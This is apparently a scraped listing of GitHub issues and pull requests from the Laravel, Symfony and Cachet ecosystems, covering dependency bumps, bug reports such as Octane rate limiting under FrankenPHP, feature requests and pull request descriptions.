  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 09:03

dependencies javascript

Bumps the npm_and_yarn group with 1 update in the / directory: form-data.

Updates form-data from 4.0.2 to 4.0.4

Dependabot compatibility score

You can trigger a rebase of this PR by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot merge will merge this PR after your CI passes on it
  • @dependabot squash and merge will squash and merge this PR after your CI passes on it
  • @dependabot cancel merge will cancel a previously requested merge and block automerging
  • @dependabot reopen will reopen this PR if it is closed
  • @dependabot close will close this PR and stop Dependabot recreating it. You can achieve the same result by closing it manually
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
  • @dependabot ignore <dependency name> minor version will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)
  • @dependabot ignore <dependency name> will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)
  • @dependabot unignore <dependency name> will remove all of the ignore conditions of the specified dependency
  • @dependabot unignore <dependency name> <ignore condition> will remove the ignore condition of the specified dependency and ignore conditions You can disable automated security fix PRs for this repo from the Security Alerts page.

Note Automatic rebases have been disabled on this pull request as it has been open for over 30 days.

View more
dependabot[bot]

dependabot[bot]

22nd Jul 2025 @ 09:12

bug
View more
Jas-n

Jas-n

9th Jul 2026 @ 07:49

View more
1 comment 👀 1
mindaugasvcs

mindaugasvcs

18th Nov 2023 @ 17:00

Add BackedEnum support for log names

You can now use a string- or int-backed enum as a log name. The enum's value is stored in the database.

enum LogName: string
{
    case Orders = 'orders';
    case Auth = 'auth';
}

// Writing
activity(LogName::Orders)->log('Order placed');   // log_name => 'orders'
activity()->useLog(LogName::Auth)->log('Login');

// Querying
Activity::inLog(LogName::Orders)->get();
Activity::inLog(LogName::Orders, LogName::Auth)->get();

By default log_name reads back as a string. To hydrate it back into an enum, set the class in the config:

  // config/activitylog.php
  'default_log_enum' => \App\Enums\LogName::class,

  Activity::all()->last()->log_name; // LogName::Orders

[!NOTE] default_log_enum is global, so only one enum applies. Log names that aren't one of its values (e.g. default) come back as plain strings.

View more
1 comment
alexanderkroneis

alexanderkroneis

16th Jun 2026 @ 14:08

Feature

Hi!

Fixes #90

This contains several new features to help integration primarily with Mailer:

encore_disable_file_tracking()

{% do encore_disable_file_tracking() %}
    {{ encore_entry_link_tags('entry1') }}
    {{ encore_entry_script_tags('entry1') }}
{% do encore_enable_file_tracking() %}

This is for usage in Email or PDF templates to tell encore to "not" use its "file tracking" system temporarily. This avoids issues where, for example, if you rendered 2 emails at once, the 2nd would have no link tags because Encore things they are already rendered.

I also considered an alternative syntax - just having {% encore_encore_file_tracking %} one time at the top of the template. If people really like that, we can try that.

2) encore_entry_css_source()

This file has "tracking" automatically disabled.

{% apply inline_css(encore_entry_css_source('my_entry')) %}
    <div>
        Hi! The CSS from my_entry will be converted into
        inline styles on any HTML elements inside.
    </div>
{% endapply %}

I'd appreciate any feedback! Thanks!

Note to self: will simplify https://symfonycasts.com/screencast/mailer/pdf-styles and https://symfonycasts.com/screencast/mailer/encore-inline_css

View more
4 comments
weaverryan

weaverryan

24th Apr 2020 @ 19:20

Summary

Drops the spatie/enum dependency in favor of a native PHP backed enum, and propagates the Status enum end-to-end through the result stores, Eloquent model, and presentation layer.

Changes

Enum conversion

  • Replaced Spatie\Health\Enums\Status with a native PHP backed enum: Status: string.

  • Added the following cases:

    • Ok
    • Warning
    • Failed
    • Crashed
    • Skipped
  • Preserved lowercase string values for backward compatibility.

  • Removed the spatie/enum dependency from composer.json.

Presentation logic moved to the enum

  • Moved presentation-related logic into Status by adding:

    • getBackgroundColor()
    • getIconColor()
    • getIcon() (web)
    • getCliColor() (CLI)
  • Removed duplicated match expressions from:

    • StatusIndicator
    • ListHealthChecksCommand
  • Simplified the status-indicator and list-cli Blade views to call the enum methods directly, eliminating closures previously passed from the component and command.

Enum propagated through the stack

  • Changed StoredCheckResult::$status to a non-nullable Status enum, defaulting to Status::Ok.

  • StoredCheckResult::toArray() now serializes the enum using ->value, keeping the JSON output unchanged.

  • Updated StoredCheckResults:

    • fromJson()
    • containsFailingCheck()
    • containsCheckWithStatus() to compare enum instances directly using strict in_array() checks.
  • Added an enum cast (Status::class) to HealthCheckResultHistoryItem, so reads and writes use enum instances directly.

  • Updated all result stores (InMemory, Cache, JsonFile, and Eloquent) to pass Status instances instead of ->value.

Bug fix

  • Wrapped temporary file paths with escapeshellarg() in the BackupsCheckTest and Pest.php helpers.
  • Fixes a failure where the truncate shell command broke when file paths contained spaces.

Backward compatibility

  • Database storage remains unchanged: the status column continues to store lowercase string values.
  • Existing JSON snapshots and persisted health check results remain fully compatible.
View more
michaelnabil230

michaelnabil230

6th Jul 2026 @ 22:25

bug pending changes

Description

Query builder constraints bypass schema state casts when applying raw settings, causing incorrect datetime filters when the Filament and app timezones differ.

Use dehydrated settings for queries while retaining raw settings for summaries.

Visual changes

Before

After

Functional changes

  • Code style has been fixed by running the composer cs command.
  • Changes have been tested to not break existing functionality.
  • Documentation is up-to-date.
View more
1 comment
people-sea

people-sea

14th Jul 2026 @ 12:13

View more
🚀 1
psone0992-ship-it

psone0992-ship-it

24th Apr 2026 @ 06:49

While Cachet currently only concerns itself with displaying statuses (and maintenance messages) for components, these are still to be created/updated manually via the Dashboard (or API). Of course there is the possibility of integrating with Oh Dear, but in the interest of presenting a truly open-source solution that kinda 'closes the loop' it'd be great to have a built-in integration with Prometheus.

At least in the past with v2, there was reasonable demand for such a solution, as elicited by the following 3rd party adapters (which unfortunately are not maintained anymore, and probably don't play well with v3):

As far as I can see, this mostly revolves around having a translator for the webhook events from Prometheus Alertmanager, some way to map the individual entities to components, and of course resolving incidents when they stop firing.

Looking forward to further discussions on this matter!

View more
👍 1
ashwinuae

ashwinuae

3rd Dec 2025 @ 14:45

This PR documents Laravel's new HTTP idempotency support so developers can understand when to use it and how to configure it.

Companion framework PR: https://github.com/laravel/framework/pull/59304

Approach

  • document route middleware usage, replay behavior, and configuration options
  • document the #[Idempotent] controller attribute and how it maps to middleware options
  • surface the feature in the built-in middleware alias reference
View more
WendellAdriel

WendellAdriel

20th Mar 2026 @ 19:08

Hi, I'm running panther crawler with chrome client on AWS Lambda. It starts by cron few times per day and every time on own new instance but randomly it throw few errors on creating client. Does anyone now where should I look to prevent it?

My arguments for client are simple like below:

'--headless',
'--no-sandbox',
'--window-size=1280x720',
'--single-process',
'--disable-gpu',

errors: The port 9515 is already in use.

disconnected: unable to send message to renderer (failed to check if window was closed: disconnected: not connected to DevTools) (Session info: chrome-headless-shell=126.0.6478.112)

session not created from chrome not reachable

View more
2 comments
lektura0bandyta

lektura0bandyta

5th Oct 2024 @ 13:04

Keep open

I have encountered this while hosting a Symfony app in a subfolder and managed to reproduce it with a minimal test case.

The behavior only shows when framework.assets.strict_mode is set to true.

Error

The error thrown is: Asset "/web-subfolder/app.b75294ae.css" not found in manifest ".../build-output/manifest.json". Did you mean one of these? "my-prefix/app.css", "my-prefix/app.js"

Reproduce

To demonstrate the problem I am setting three different values for these three directories:

  • output (setOutputPath): 'build-output/'
  • web root (setPublicPath): '/web-subfolder'
  • manifest key prefix (setManifestKeyPrefix): 'my-prefix/'

manifest.json:

{
  "my-prefix/app.css": "/web-subfolder/app.b75294ae.css",
  "my-prefix/app.js": "/web-subfolder/app.53d71f57.js"
}

entrypoints.json:

{
  "entrypoints": {
    "app": {
      "js": [
        "/web-subfolder/app.53d71f57.js"
      ],
      "css": [
        "/web-subfolder/app.b75294ae.css"
      ]
    }
  }
}

Template:

{{ encore_entry_link_tags('app') }}

Fix

I'm not really sure I completely understand how all the parts work together, but it seems to me that there is no need to call getAssetPath in TagRenderer->renderWebpackLinkTags (here), since the entrypoint already provides the "mapped" values.

Demo

I have created a demo repository here. The relevant changes to reproduce are in this commit.

View more
6 comments
bmorg

bmorg

3rd Apr 2024 @ 07:52

Hi!

When creating a new incident, you can select the affected component. My feature request is, to add 's in the select-input, to display and group/order the component groups. That way, when I have component group 1 with the component "webservice" and component group 2 with the component "webservice", I can see which one is the one I want to select.

Thanks!

View more
1 comment
AffluentAvo

AffluentAvo

24th Feb 2025 @ 12:52

When the url contains unicode, toString(), returns an url encoded string which is not human readable

$reference = Url::parse("https://test.com");
$url = $reference->resolve('/デジカ/');

echo $url->toString(); // https://test.com/%E3%83%87%E3%82%B8%E3%82%AB/

I suggest to add a new method toPrettyString() which simply returns the url decoded string.

    public function toPrettyString(): string
    {
        return urldecode($this->url);
    }
https://test.com/デジカ/
View more
2 comments
8ctopus

8ctopus

18th Aug 2025 @ 07:32

What is this PR doing?

This PR adds documentation for the new JsonApiResource feature introduced in Laravel 12.45.0. It includes:

  • Instructions on how to generate a JSON:API resource using the --json-api flag.

  • An explanation of how the JsonApiResource automatically structures the JSON output to adhere to the JSON:API specification (wrapping attributes, handling id and type).

  • A code example showing a basic implementation and the resulting JSON structure.

Why is this change being made?

With the release of Laravel 12.45.0, developers now have native support for creating JSON:API compliant resources. However, this feature is not yet mentioned in the official Eloquent: API Resources documentation. Adding this section ensures that the documentation stays up-to-date with the latest framework features and helps developers implement the specification correctly.

Reference This documentation corresponds to the framework changes in:

Framework PR: laravel/framework#57571

Release: Laravel v12.45.0

View more
1 comment 🚀 2
irabbi360

irabbi360

11th Jan 2026 @ 06:59

Octane Version

2.14.0

Laravel Version

12.52.0

PHP Version

8.5.3

What server type are you using?

FrankenPHP

Server Version

1.12.0

Database Driver & Version

N/A

Description

Cannot start Laravel Octane (FrankenPHP) on Windows. Throws error:

Undefined constant "Laravel\Octane\Commands\Concerns\SIGINT"

  at vendor\laravel\octane\src\Commands\Concerns\InteractsWithServers.php:174

Note: FrankenPHP added native Windows support in 1.12.0.

Steps To Reproduce

As described by FrankenPHP: https://frankenphp.dev/docs/laravel/#laravel-octane/

View more
1 comment
Vectorial1024

Vectorial1024

9th Mar 2026 @ 04:17

Related to #1626, here's a PR to fit that need. I've checked it's backwards compatible, so if you want to keep the current behaviour, you just have to confirm the default guessing. If you want to have a different table name from the default guessing, just enter when prompted. And I've tested that if you enter a keyword, it's properly quoted.

View more
omgslinux

omgslinux

26th Aug 2025 @ 02:17

needs more info

Laravel Version

12.x

PHP Version

8.2.x

Database Driver & Version

TBD

Description

Upgraded from v10.x to 12.x, using an RDS Proxy and RDS MySQL, with a charset and collation defined - it caused session pinning and a spike in DB connections.

We traced the change down to this PR: https://github.com/laravel/framework/pull/50044

The session pinning is caused by SET charset, when RDS MySQL defaults to "latin".

Did not try to fix in application, instead we migrated RDS MySQL with parameters group setting the charset and collation values.

Steps To Reproduce

  1. AWS RDS MySql with "latin" default charset and collation
  2. AWS RDS Proxy
  3. Application config/database.php mysql connection settings must have a charset and collation defined.

Observe RDS Proxy connections to RDS MySQL connections in sleep state.

View more
2 comments
Stoyvo

Stoyvo

25th Apr 2026 @ 03:35

Hello,

I was playing with #[WithMonologChannel] attribute. Without reading the doc, I put it on the constructor parameter, because I thought it would work like #[Target], #[Autowire], ... attributes

class HomepageController extends AbstractController
{
    public function __construct(
        #[WithMonologChannel('homepage')]
        private readonly LoggerInterface $logger,
        private readonly MessageBusInterface $bus,
    ) {
    }

But, what a surprise, it didn't work.

Instead it must be set on the class

#[WithMonologChannel('homepage')]
class HomepageController extends AbstractController
{
    public function __construct(
        private readonly LoggerInterface $logger,
        private readonly MessageBusInterface $bus,
    ) {
    }

What about allowing it on the parameter instead ? It feels more natural. And it allows having N different logger

class HomepageController extends AbstractController
{
    public function __construct(
        #[WithMonologChannel('homepage')]
        private readonly LoggerInterface $logger,
        #[WithMonologChannel('billing')]
        private readonly LoggerInterface $billingLogger,
        private readonly MessageBusInterface $bus,
    ) {
    }

WDYT ?

View more
3 comments 👍 5
lyrixx

lyrixx

21st Feb 2024 @ 21:11

Bug Console Status: Needs Review
Q A
Branch? 6.4
Bug fix? yes
New feature? no
Deprecations? no
Issues Fix #64830
License MIT

Application::doRun() dispatches ConsoleEvents::ERROR as soon as find() throws, and only afterwards figures out that the given name is in fact a namespace to describe:

} else {
    if (null !== $this->dispatcher) {
        $event = new ConsoleErrorEvent($input, $output, $e);
        $this->dispatcher->dispatch($event, ConsoleEvents::ERROR);   // <- too early
        ...
    }

    try {
        if ($e instanceof CommandNotFoundException && $namespace = $this->findNamespace($name)) {
            // ... describe the namespace, this is not an error

So bin/console secrets --list prints the expected listing, while ErrorListener has already logged console.CRITICAL: Error thrown while running command "secrets --list". Message: "Command "secrets" is not defined.".

The error event is now dispatched only once we know we are not describing a namespace. A name that matches no namespace still goes through the error path, so a command that really does not exist keeps being reported:

before after
secrets --list CRITICAL logged no log
secrets CRITICAL logged no log
nope --list (unknown) CRITICAL logged CRITICAL logged

Behaviour changes worth a look

Dispatching the event on that path had three side effects that go away:

  • the namespace listing returned $event->getExitCode(), it now always returns 1. In practice this was already 1 (CommandNotFoundException has code 0, so ConsoleErrorEvent falls back to 1), but a listener could change it.
  • a listener setting the exit code to 0 used to make doRun() return 0 before describing anything; the listing is now printed.
  • a listener replacing the exception through $event->setError() could make the $e instanceof CommandNotFoundException check fail and suppress the listing.

Tests

testRunNamespaceDoesNotDispatchTheErrorEvent fails without the fix. testRunUnknownCommandDispatchesTheErrorEvent guards the other direction, so that "fixing" this by never dispatching the event would not go unnoticed.

View more
4 comments
Amoifr

Amoifr

9th Jul 2026 @ 16:32

This adds much more speed to the whole findACL process with large databases

View more
HotfixGuru

HotfixGuru

15th Mar 2017 @ 07:47

Hello, i am trying to set up cachet with an existing postgres installation.

I did the following:

version: "3"

services:
  # postgres:
  #   image: postgres:12-alpine
  #   volumes:
  #     - /var/lib/postgresql/data
  #   environment:
  #     - POSTGRES_USER=postgres
  #     - POSTGRES_PASSWORD=0q7QwkcLR7hhxvRYsz1ETaDhiD9hFZeEfPAeN71xSoKk34tdxx
  #     - POSTGRES_DATABASE=cachet
  #   restart: always
  cachet:
    build:
      context: .
      args:
        - cachet_ver=2.4
    ports:
      - 81:8000 
    # links:
    #   - postgres:postgres
    environment:
      - DB_DRIVER=pgsql
      - DB_HOST=/var/run/postgresql
      - DB_PORT=5432
      - DB_DATABASE=cachet  #created that db
      - DB_USERNAME=postgres
      - DB_PASSWORD=<postgres-user-password>
      - DB_PREFIX=chq_
      - APP_KEY=${APP_KEY:-null}
      - APP_LOG=errorlog
      - APP_ENV=${APP_ENV:-production}
      - APP_DEBUG=false
      - DEBUG=false
    restart: on-failure

I needed to change to another port as 80 is already exposed for a different service of us

  • docker compose build
  • docker compose up
[+] Running 1/0
 ✔ Container cachet-docker-cachet-1  Created                                                                                                                                                                                                                                                  0.0s 
Attaching to cachet-1
cachet-1  | Initializing Cachet container ...
cachet-1  | ERROR: Please set the 'APP_KEY=base64:xxx' environment variable at runtime or in docker-compose.yml and re-launch
cachet-1 exited with code 0
  • set the APP_KEY
  • docker compose build & docker compose up:
 ✔ Container cachet-docker-cachet-1  Recreated                                                                                                                                                                                                                                                0.1s 
Attaching to cachet-1
cachet-1  | Initializing Cachet container ...
cachet-1  | Attempting to connect to database ...
cachet-1  | ...........................................................
cachet-1  | Could not connect to database server! Aborting...
cachet-1 exited with code 0
View more
1 comment
lb-ovc

lb-ovc

13th Oct 2024 @ 22:36

Hello, I would like to report an issue or suggest a possible improvement.

The incident_updated event does not send updates when a message is updated within an active incident. It only triggers when the incident itself is updated, such as when its status changes, etc.

I believe it would be useful if the event also sent updates for messages within the incident.

Thanks!

View more
lrqnet

lrqnet

20th Jan 2026 @ 12:21

dependencies github_actions

Bumps stefanzweifel/git-auto-commit-action from 5.2.0 to 7.2.0.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 03:12

enhancement good first issue

using prompt engineering techniques provide enhancement to the Claude service class in the Claude prompt class, creating functions commonly used in Laravel applications. For example, brand builder, seo product optimizer, video and or image captioner, automated chatbots #goodfirstissue

View more
kwakuOfosuAgyeman

kwakuOfosuAgyeman

5th Jan 2025 @ 05:38

The url that is generated when a non logged user clicks on Browse Backend is https://<domain>/index.php/en/login. This is a valid index.php url. but it is not well managed. The url is stored in the login form with <form action="/index.php/en/login" method="post">. Perhaps when the form is received by the security module, it considers the index.php as if it was a subfolder in a pretty url. Another part of the code detects correctly that the app uses index.php url and normally prepends it to the url path, which has already index.php in it (but incorrectly as a part of a pretty url). After login, it redirects to https://<domain>/index.php/index.php/en/admin/post/, which is not a valid url.

I also checked the headers sent by Symfony using a register_shutdown_function that calls headers_list() and it contains the header Location: https://<domain>/index.php/index.php/en/admin/post/ and this is why this url is requested to the server after the redirection. It is not the web server, nginx in my case, that adds the extra index.php.

View more
7 comments
Dominic-Mayers

Dominic-Mayers

2nd Feb 2026 @ 04:03

dependencies javascript

Bumps vite and laravel-vite-plugin. These dependencies needed to be updated together. Updates vite from 7.3.2 to 8.1.3

Updates laravel-vite-plugin from 2.1.0 to 3.1.0

import { defineConfig } from 'vite'; import laravel from 'laravel-vite-plugin';

export default defineConfig({ plugins: [ laravel({ input: ['resources/css/app.css', 'resources/js/app.js'], refresh: true,

  •       assets: [
    
  •           'resources/images/**',
    
  •           'resources/favicons/**',
    
  •       ],
      }),
    
    ], });
View more
dependabot[bot]

dependabot[bot]

26th Jun 2026 @ 11:02

hasPR Serializer
Q A
Feature PR symfony/symfony#64650
PR author(s) @nicolas-grekas
Merged in 8.2

We created this issue to not forget to document this new feature. We would really appreciate if you can help us with this task. If you are not sure how to do it, please ask us and we will help you.

To fix this issue, please create a PR against the 8.2 branch in the symfony-docs repository.

Thank you! :smiley:

View more
fabpot

fabpot

10th Jul 2026 @ 20:36

Problem

Setting SYMFONY_REQUIRE=7.4 (or any exact version like 7, 7.4.1) is treated by Composer as the constraint = 7.4.0.0 — it will only match that single specific version.

This causes two classes of silent failures:

  • Security advisories block exact versions. When a package version is flagged by a security advisory, Composer refuses to install it. With an exact constraint, there is no fallback version, so the installation fails with no clear explanation. See composer/composer#12936.

  • Not all packages exist at every bugfix version. Symfony skips publishing packages that have no changes in a given bugfix release. For example, symfony/console 7.4.3 may not exist if there were no changes to that component in that release. An exact constraint would then fail to resolve.

The intended constraints are 7.4.* (allows any 7.4.x) or ^7.4 (allows >=7.4.0 <8.0.0).

Solution

Use Composer\Semver\VersionParser to parse the constraint and detect when it resolves to a single == constraint (i.e. an exact version). A warning is then emitted suggesting the correct form:

[warning] SYMFONY_REQUIRE="7.4" is an exact version constraint. Did you mean "7.4.*" or "^7.4"?

This applies whether the value comes from the SYMFONY_REQUIRE environment variable or from extra.symfony.require in composer.json.

View more
❤️ 1
GromNaN

GromNaN

16th Jun 2026 @ 20:46

Bumps actions/cache from 4 to 6.

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore this major version will close this PR and stop Dependabot creating any more for this major version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this minor version will close this PR and stop Dependabot creating any more for this minor version (unless you reopen the PR or upgrade to it yourself)
  • @dependabot ignore this dependency will close this PR and stop Dependabot creating any more for this dependency (unless you reopen the PR or upgrade to it yourself)
View more
1 comment
dependabot[bot]

dependabot[bot]

29th Jun 2026 @ 16:02

hello .

I installed cahethq on a docker but I can't configure the sending of emails.

when I test, I have the 500 error on the other hand when I want to register a subscriber it passes.

Thanks for your help.

View more
👍 1
nadjial

nadjial

15th Sep 2022 @ 15:18

The stub at database/migrations/create_activity_log_table.php.stub is missing the down() method. This means php artisan migrate:rollback silently no-ops the activity_log table, leaving it in place when all other tables are dropped.

This PR adds the standard Schema::dropIfExists('activity_log') in down().

View more
thaolaptrinh

thaolaptrinh

9th Jul 2026 @ 13:43

Stalled Keep open

Just a reminder to write a documentation for Encore.configureDefinePlugin(), and the integration with Symfony .env files and process.env.*.

Encore.configureDefinePlugin(options => {
  options['process.env'].MY_OPTION = JSON.stringify('foo');
});

For example for configuring sentry DNS from .env file:

Encore.configureDefinePlugin(options => {
  const env = dotenv.config();
    
  if (env.error) {
    throw env.error;
  }

  options['process.env'].SENTRY_DSN = JSON.stringify(env.parsed.SENTRY_DSN);
});
View more
20 comments 👍 8
Kocal

Kocal

16th Apr 2019 @ 15:55

Priority: P3 (Medium - Plan to Fix)

Problem

In src/Actions/Integrations/ImportOhDearFeed.php:38, the comparison $site['status'] === 'up' uses a raw magic string.

The ExternalProviderEnum already has a status() method that maps external strings to IncidentStatusEnum, but there is no equivalent for component status mapping.

Suggested Fix

Add a componentStatus() method to ExternalProviderEnum (or a dedicated mapper) to centralize the 'up' / 'down' to ComponentStatusEnum mapping.

View more
jbrooksuk

jbrooksuk

9th Mar 2026 @ 11:42

Fix: media-library:clean ignores a custom PathGenerator when removing orphaned directories

Fixes the bug reported in #3809.

Problem

media-library:clean's orphaned-directory cleanup (deleteOrphanedDirectories()) assumed the default {prefix}/{mediaId} layout. It listed the top-level directories on the disk, kept only the ones whose names were numeric (->filter(fn ($d) => is_numeric($d))), and compared them against the set of media IDs.

With a custom PathGenerator (UUID-based, hash-based, nested, etc.) the on-disk directory names are not numeric media IDs, so:

  • every directory was filtered out by is_numeric(), and
  • orphaned-directory cleanup silently became a no-op.

This is inconsistent with the sibling halves of the same command: deleteConversionFilesForDeprecatedConversions() already resolves paths via PathGeneratorFactory::create($media)->getPathForConversions($media). Only the orphaned-directory half was still ID-based.

Root cause

src/MediaCollections/Commands/CleanCommand.phpdeleteOrphanedDirectories():

  • $mediaIdSet = $this->mediaRepository->allIds()->flip(); — assumes dirs are named with media IDs.
  • ->filter(fn (string $directory) => is_numeric($directory)) — drops every non-numeric (custom-layout) directory.

Fix

Derive the set of in-use top-level directories from the live media through the configured path generator(s), instead of assuming numeric IDs:

$usedDirectories = $this->mediaRepository->all()
    ->map(fn (Media $media) => $this->getTopLevelDirectory(
        PathGeneratorFactory::create($media)->getPath($media), $prefix
    ))
    ->filter()
    ->collect()
    ->unique()
    ->flip();

On-disk top-level directories that are not in that set are treated as orphaned and removed. This mirrors how the rest of the command resolves paths and makes orphaned-directory cleanup correct for any path generator — the default numeric layout still works (covered by a regression test). prefix, --dry-run, and --rate-limit behaviour are preserved.

Behavioural note

The previous is_numeric() filter also acted as an incidental guard against deleting foreign directories on a shared disk. The new logic deletes any top-level directory under the configured prefix that no media maps to. This matches the documented expectation that media-library owns its disk/prefix (and is consistent with the conversion-cleanup half, which already deletes per resolved path). Using a dedicated disk or a media-library.prefix remains the recommended setup.

Tests

Added to tests/Conversions/Commands/CleanCommandTest.php:

  • it('can clean orphaned directories when using a custom path generator') — registers CustomPathGenerator (hash-based, non-numeric layout), creates a live media plus a leftover orphan directory in the custom layout, runs media-library:clean, asserts the orphan dir is removed and the live media dir is kept. Fails on main (orphan never matched, so never deleted), passes with the fix.
  • it('keeps cleaning orphaned directories for the default numeric path generator') — regression guard for the default {id} layout.

Test results (PHP 8.3, vendor/bin/pest tests/Conversions/Commands/CleanCommandTest.php):

Tests: 19 passed (121 assertions)


Verified test-first: with the source fix reverted (test only), `it can clean orphaned directories when using a custom path generator` **fails** ("orphan directory … does not exist" assertion fails — the dir is never removed); with the fix applied it passes. Full suite: 414 passed / 23 skipped (the only failures in this sandbox are pre-existing and unrelated — they require the `imagick` PHP extension, which isn't installed here). `phpstan analyse` on the changed file: no errors.

### AI assistance

This change was developed with AI assistance (Claude Code, Anthropic, Opus 4.x). The AI did the codebase investigation, drafted the fix and the failing-first tests, and ran the suite. I (the contributor) set the direction, verified the root cause against the live source on `main` and `next-major`, reviewed the diff and behavioural trade-off, and confirmed the test fails without the fix and passes with it. The commit carries an `Assisted-by:` trailer.

Note on the CHANGELOG: not hand-edited, since this repo auto-generates `CHANGELOG.md` on release via `update-changelog.yml` (changelog-updater-action).

cc @freekmurze — this is the orphaned-directory half of #3809; on inspection the same `is_numeric`/ID-based code is still present on both `main` and `next-major`, so it didn't get the `PathGeneratorFactory` treatment that the conversion-cleanup half has. Happy to adjust the approach (e.g. re-add a guard) if you'd prefer.
View more
nikolauspschuetz

nikolauspschuetz

29th Jun 2026 @ 19:08

To me, the most logical place to look for that would be https://symfony.com/doc/current/components/index.html

Alas, that page seems to be an auto-generated ToC.

Problem 1: it shows a flat list of links, whereas it should really sport a 2-levels-indented list, so that eg. "APCu Cache Adapter" is indented one-level more than "The cache Component"

Problem 2: it does not list at all many components f.e. the DotEnv component

One place where the list of components is available is https://symfony.com/packages, but it seems to allow filtering only via JS and not providing a way to link to it with useful params in the query string - such as type=components, include-deprecated=false, sort-by=alphabetical and sf-major-version=6.4

View more
1 comment
gggeek

gggeek

16th May 2026 @ 15:03

help wanted

Octane Version

v2.3.10

Laravel Version

v11.6.0

PHP Version

v8.3.6

What server type are you using?

FrankenPHP

Server Version

v1.1.4 PHP 8.3.6 Caddy v2.7.6

Database Driver & Version

Postgress

Description

Last week we updated our app previously using php-fpm running on Forge to use Laravel Octane with FrankenPHP. Our site is mostly an API that handles analytics events (Like google analytics). It uses the default Laravel api throttling.

In staging our app worked fine (30 req/sec same IP), but when deploying to production (1400 req/sec, different IPs) it started to fail, giving a lot of 429 Too Many Requests.

image

I quickly rolled back to php-fpm and after a few hours tried again with the same problem. Rolled back and the next day I switched to Swoole and it worked perfectly without changing a single line of code nor having to redeploy anything. So I can confidently say that is NOT a bug in my code, but rather a bug with FrankenPHP or the Octane integration with FrankenPHP.

My theory is that the RateLimiter is not reseting between requests so it's shared between different users. So multiple different users trigger the rate limiter:

This is my Rate limiter configuration:

// AppServiceProvider

RateLimiter::for('api', function (Request $request) {
    return Limit::perMinute(60)->by($request->user()?->id ?: $request->ip());
});

our production CACHE_STORE is redis. Throttling worked perfectly fine without octane and with octane but using Swoole. It failed with hundred of 429 Too Many Requests after installing FrankenPHP.

This is our bootstrap/app.php:

<?php

use Illuminate\Foundation\Application;
use Illuminate\Foundation\Configuration\Exceptions;
use Illuminate\Foundation\Configuration\Middleware;
use Illuminate\Support\Facades\App;

return Application::configure(basePath: dirname(__DIR__))
    ->withRouting(
        commands: __DIR__.'/../routes/console.php',
        health: '/up',
        then: function () {
            Route::middleware('api')
                ->prefix('api')
                ->as('api.')
                ->domain(config('app.domain'))
                ->group(base_path('routes/api.php'));

            Route::middleware('web')
                ->domain(config('app.domain'))
                ->group(base_path('routes/web.php'));

            Route::middleware('web')
                ->domain(config('playsaurus.ads.domain'))
                ->group(base_path('routes/ads.php'));
        }
    )
    ->withMiddleware(function (Middleware $middleware) {
        $middleware->throttleApi();

        $middleware->redirectTo(
            guests: '/login',
            users: '/',
        );

        $middleware->web(append: [
            \App\Http\Middleware\HandleInertiaRequests::class,
            \Illuminate\Http\Middleware\AddLinkHeadersForPreloadedAssets::class,
        ]);

        $middleware->api(append: [
            \App\Http\Middleware\ConfigureLocale::class,
        ]);

        $middleware->alias([
            'localize' => \App\Http\Middleware\ConfigureLocale::class,
            'embed' => \App\Http\Middleware\AllowsEmbeding::class,
        ]);
    })
    ->withExceptions(function (Exceptions $exceptions) {
        $exceptions->dontReport([
            \App\Services\Announcements\InvalidVariantKey::class,
            \App\Exceptions\CouponRedeemException::class,
        ]);
    })->create();

Steps To Reproduce

It's difficult to reproduce. Because I can't test it in production because that would mean a lot of downtime for our users.

My theory is that it would be possible to reproduce from multiple different IPs. But since I don't have the means to test it, I don't know.

View more
12 comments 👍 1
jhm-ciberman

jhm-ciberman

14th May 2024 @ 00:15

Documentation Status: Needs Review Toolkit
View more
1 comment
seb-jean

seb-jean

22nd May 2026 @ 16:28

dependencies Status: Needs Review javascript

Bumps the preact group with 1 update: preact.

Updates preact from 10.29.1 to 10.29.3

Dependabot compatibility score

Dependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting @dependabot rebase.


You can trigger Dependabot actions by commenting on this PR:

  • @dependabot rebase will rebase this PR
  • @dependabot recreate will recreate this PR, overwriting any edits that have been made to it
  • @dependabot show <dependency name> ignore conditions will show all of the ignore conditions of the specified dependency
  • @dependabot ignore <dependency name> major version will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)
